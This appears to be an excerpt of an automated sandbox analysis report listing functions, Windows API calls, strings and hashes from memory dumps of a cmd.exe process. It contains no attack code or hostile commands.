                                                                                                                                            • String ID: %s=%s
                                                                                                                                            • API String ID: 1019019434-1087296587
                                                                                                                                            • Opcode ID: b1945f90cce55a95771ff5e7d1555888271ddb24e7433c2e9fb3201130694b65
                                                                                                                                            • Instruction ID: e60f7c7e6965ef766ee18e0cea467421d1d7aec83e62aa47589c85fa5b057b7c
                                                                                                                                            • Opcode Fuzzy Hash: b1945f90cce55a95771ff5e7d1555888271ddb24e7433c2e9fb3201130694b65
                                                                                                                                            • Instruction Fuzzy Hash: 6A41D072D21225ABDB319F54DC0EEAF7A78EB85B50F40411AFC06A6254D7364D51CBA0
                                                                                                                                            Function 00266035 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00266069
                                                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 0026607E
                                                                                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 002660DC
                                                                                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00266128
                                                                                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 0026614F
                                                                                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00266186
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                            • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                            • API String ID: 1580871199-2613899276
                                                                                                                                            • Opcode ID: 8ac0a8a435ea136a48fccad4aaa23fc234b3fbbd2b0aed010b7e66888af6f055
                                                                                                                                            • Instruction ID: bb272210dd8a60ccae62ebf460b731613507fec6672b94f66b5f896d26ad4000
                                                                                                                                            • Opcode Fuzzy Hash: 8ac0a8a435ea136a48fccad4aaa23fc234b3fbbd2b0aed010b7e66888af6f055
                                                                                                                                            • Instruction Fuzzy Hash: 4141A6B4A11219ABEB209B24DC8DF7F767CEB01744F0041A9E609E3281DB709E85CF65
                                                                                                                                            Function 0025654B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _wcsicmp.MSVCRT ref: 002565A4
                                                                                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 002565D7
                                                                                                                                            • _open_osfhandle.MSVCRT ref: 002565EB
                                                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00262092
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                            • String ID: con
                                                                                                                                            • API String ID: 689241570-4257191772
                                                                                                                                            • Opcode ID: ab53ebb8d7c10e19263778ffb3484e7a9b996ef88428acebecc85377a92b1c03
                                                                                                                                            • Instruction ID: 200b8483f8b2b95279f3c70db59fa6af85c720673b78d5437654417045df12f4
                                                                                                                                            • Opcode Fuzzy Hash: ab53ebb8d7c10e19263778ffb3484e7a9b996ef88428acebecc85377a92b1c03
                                                                                                                                            • Instruction Fuzzy Hash: 2E317C72A60201AFE7244FA8AC4DB6F77A9E750371F70422AE812E31C0EF708C18C755
                                                                                                                                            Function 0024802C Relevance: 13.7, APIs: 9, Instructions: 175COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00248060
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 002481BE
                                                                                                                                              • Part of subcall function 0024DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000), ref: 0024DCE1
                                                                                                                                              • Part of subcall function 0024DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000,00000000), ref: 0024DCE8
                                                                                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0024818C
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00248197
                                                                                                                                            • longjmp.MSVCRT(00280A30,00000001,-00000001,00000000,?,00000000), ref: 0025B09E
                                                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00267FC9,?,002699AE,00000000,?,00000000,0025CF94,00000000,?), ref: 0025B0AB
                                                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00267FC9,?,002699AE,00000000,?,00000000,0025CF94,00000000,?), ref: 0025B0C1
                                                                                                                                            • fprintf.MSVCRT ref: 0025B0D5
                                                                                                                                            • fflush.MSVCRT ref: 0025B0E3
                                                                                                                                              • Part of subcall function 00248F21: _wcsicmp.MSVCRT ref: 00248FCD
                                                                                                                                              • Part of subcall function 00248F21: _wcsicmp.MSVCRT ref: 00248FE3
                                                                                                                                              • Part of subcall function 00248F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00249002
                                                                                                                                              • Part of subcall function 00248F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00249013
                                                                                                                                              • Part of subcall function 00248E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00288BF0,00000000,?), ref: 00248EC3
                                                                                                                                              • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D3A
                                                                                                                                              • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D44
                                                                                                                                              • Part of subcall function 00251CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D57
                                                                                                                                              • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D61
                                                                                                                                              • Part of subcall function 002501F5: wcsrchr.MSVCRT ref: 002501FB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3753564779-0
                                                                                                                                            • Opcode ID: 267ffbabc4f62f24659f7813e9af80915328df0784c353620c492666f31fc045
                                                                                                                                            • Instruction ID: f48532384f7673d2ae6c474aa11e207878deded2f7531a4a6a6e92026f95e267
                                                                                                                                            • Opcode Fuzzy Hash: 267ffbabc4f62f24659f7813e9af80915328df0784c353620c492666f31fc045
                                                                                                                                            • Instruction Fuzzy Hash: 4B51F331A302129BDB289FB4EC9AA7F77B4EF04311F14041AE90ED7291EF7489A5CB55
                                                                                                                                            Function 002538D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset
                                                                                                                                            • String ID: %s
                                                                                                                                            • API String ID: 2221118986-3043279178
                                                                                                                                            • Opcode ID: 1ad5b87cb6ab84c67a64c9469a8369b178e153d4413e13defcc636bcebcfe358
                                                                                                                                            • Instruction ID: f326f2a88f01a0b4aaee869028f136b287b6baa6bf0b8ed4af4d73c917f78e7a
                                                                                                                                            • Opcode Fuzzy Hash: 1ad5b87cb6ab84c67a64c9469a8369b178e153d4413e13defcc636bcebcfe358
                                                                                                                                            • Instruction Fuzzy Hash: 6691D4716283429BD734DF10D845BABB3E4BF84346F00092DFD8987180EB74EA68CB5A
                                                                                                                                            Function 00253CD0 Relevance: 9.4, APIs: 6, Instructions: 438COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00253D30
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00253E3D
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00253E88
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$FullNamePath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3158150540-0
                                                                                                                                            • Opcode ID: aaec6d7ec637f1f746a8d2ec537d14e9f4d494d2851c5c6ff79b0e6472a39c9a
                                                                                                                                            • Instruction ID: 92d1a163656a25472a0060eca3e6355cf7b9196f5d06b36ad34a8c8f3add7b68
                                                                                                                                            • Opcode Fuzzy Hash: aaec6d7ec637f1f746a8d2ec537d14e9f4d494d2851c5c6ff79b0e6472a39c9a
                                                                                                                                            • Instruction Fuzzy Hash: F002F434A211168BCB24DF68DD997B9B3B1FF48315F1881E9DC0A97250D734AE96CF48
                                                                                                                                            Function 0024AD60 Relevance: 9.3, APIs: 6, Instructions: 328COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,7AF70A41,00000001,?), ref: 0024ADB6
                                                                                                                                              • Part of subcall function 00255A2E: memset.MSVCRT ref: 00255A5A
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • towupper.MSVCRT ref: 0024B0E3
                                                                                                                                              • Part of subcall function 0024E950: memset.MSVCRT ref: 0024E9A0
                                                                                                                                              • Part of subcall function 0024E950: wcschr.MSVCRT ref: 0024E9FC
                                                                                                                                              • Part of subcall function 0024E950: wcschr.MSVCRT ref: 0024EA14
                                                                                                                                              • Part of subcall function 0024E950: _wcsicmp.MSVCRT ref: 0024EA80
                                                                                                                                            • wcschr.MSVCRT ref: 0024AED2
                                                                                                                                            • wcsncmp.MSVCRT ref: 0024B016
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
                                                                                                                                              • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 0025CC6C
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0025CCCB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4198873954-0
                                                                                                                                            • Opcode ID: 2c7ba49b9465b62075d9ebdb1d7b14c601f2b3fbd8a76a89ecdf854553d3bf82
                                                                                                                                            • Instruction ID: 399df9e39f425caaaa20555254f0ce297850e71578017da665fd7cdf7ce8ba22
                                                                                                                                            • Opcode Fuzzy Hash: 2c7ba49b9465b62075d9ebdb1d7b14c601f2b3fbd8a76a89ecdf854553d3bf82
                                                                                                                                            • Instruction Fuzzy Hash: 79B14A71A302128BCB2CAF28CC9977A7364EF40302F154069DD1E976D1EB719DB9CB96
                                                                                                                                            Function 00267540 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
                                                                                                                                              • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
                                                                                                                                            • _wcsicmp.MSVCRT ref: 002675AC
                                                                                                                                            • _wcsicmp.MSVCRT ref: 002675CB
                                                                                                                                            • _wcsicmp.MSVCRT ref: 002675F1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmpwcschr$iswspace
                                                                                                                                            • String ID: KEYS$LIST$OFF
                                                                                                                                            • API String ID: 3924973218-4129271751
                                                                                                                                            • Opcode ID: 04def407998a911ec2707472316a6dfae315409cce175c541ad61242bac47250
                                                                                                                                            • Instruction ID: 9be68718d48a7803fa7fd3f9adcb3b7ca5209f56e28ed1f363bf7ec885f7056d
                                                                                                                                            • Opcode Fuzzy Hash: 04def407998a911ec2707472316a6dfae315409cce175c541ad61242bac47250
                                                                                                                                            • Instruction Fuzzy Hash: 95113D3123D702DAE71DAB25FC8A8776358EB807283A4405FF903850C0EEA45AE18695
                                                                                                                                            Function 03C1B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction ID: 24d9f4011311f437e58d19d303b3bd8f64135171f7c716ff359b74f130824f01
                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction Fuzzy Hash: DC81C071E152499EEF28CE68C4507BEBBA1AF57710F1C4159E851EB390C7708E61BFA0
                                                                                                                                            Function 00245020 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00245074
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0024515F
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
                                                                                                                                              • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
                                                                                                                                            • iswspace.MSVCRT ref: 00259289
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcschr$iswspacememset
                                                                                                                                            • String ID: %s
                                                                                                                                            • API String ID: 2220997661-3043279178
                                                                                                                                            • Opcode ID: 57d34ec1e12319e44a84e41c8f3d9bfdbaca6a7c00d213f24d258d0944fb64b0
                                                                                                                                            • Instruction ID: db63b283f99d4af30f4c03eb6c297bc520f847497b7012e7493b2dc3f1d9482b
                                                                                                                                            • Opcode Fuzzy Hash: 57d34ec1e12319e44a84e41c8f3d9bfdbaca6a7c00d213f24d258d0944fb64b0
                                                                                                                                            • Instruction Fuzzy Hash: 47510375E20222ABDB28DF64D84567BB3F5EF48310F1400ADEC4AD7241EB309DA1CB94
                                                                                                                                            Function 002670D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00267121
                                                                                                                                            • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00267197
                                                                                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 002671FF
                                                                                                                                            Strings
                                                                                                                                            • %WINDOWS_COPYRIGHT%, xrefs: 00267107
                                                                                                                                            • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 002670EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                            • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                            • API String ID: 1103618819-4062316587
                                                                                                                                            • Opcode ID: 7c22c3c023999b7d85fcce8b6e1b2d074325a1186e8ffbcaf815ddad76edd0e0
                                                                                                                                            • Instruction ID: 0106f74c97af1e7b84bf35cc1588a2c55b4732b4b1449f1f6f1220778dbdd9c2
                                                                                                                                            • Opcode Fuzzy Hash: 7c22c3c023999b7d85fcce8b6e1b2d074325a1186e8ffbcaf815ddad76edd0e0
                                                                                                                                            • Instruction Fuzzy Hash: FC410A39B2121687CF20CF68A8547BA73F1EF49704F6800ABED49EB350EA759D92C350
                                                                                                                                            Function 03C820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                            • Opcode ID: 669d456a71bafd90d85e12035dcb38a035018f5c46ebf3be94345ea1fe56f964
                                                                                                                                            • Instruction ID: a8f43b38fa0135bbed05e3705ee266b5a46492adb158726cb4967225cd17104f
                                                                                                                                            • Opcode Fuzzy Hash: 669d456a71bafd90d85e12035dcb38a035018f5c46ebf3be94345ea1fe56f964
                                                                                                                                            • Instruction Fuzzy Hash: 94216576A00219ABDB10EF79CC44AEEBBF8EF44644F590526E905E7200E735DF11ABA1
                                                                                                                                            Function 00244D42 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00244D66
                                                                                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00244D8A
                                                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00244D95
                                                                                                                                            Strings
                                                                                                                                            • UBR, xrefs: 00244D82
                                                                                                                                            • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00244D5C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                            • API String ID: 3677997916-3870813718
                                                                                                                                            • Opcode ID: 33a8abda3e9e636d368aeb3bae1f396db7ec2319054e301e8fc86b737619dc81
                                                                                                                                            • Instruction ID: b6899ad15096d5148a47122ef641fd5cc1271269e4f87ac1cd4153e71d555858
                                                                                                                                            • Opcode Fuzzy Hash: 33a8abda3e9e636d368aeb3bae1f396db7ec2319054e301e8fc86b737619dc81
                                                                                                                                            • Instruction Fuzzy Hash: 18016976E10218FBEB209B94DC49FEEBBB8EB84710F104067EE02B2144D6709A21DB50
                                                                                                                                            Function 0024FCE9 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0024FD3A
                                                                                                                                            • wcsspn.MSVCRT ref: 0024FF18
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00252229,00000000,-00000105,?,00000000,00000000), ref: 0025000F
                                                                                                                                              • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D3A
                                                                                                                                              • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D44
                                                                                                                                              • Part of subcall function 00251CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D57
                                                                                                                                              • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
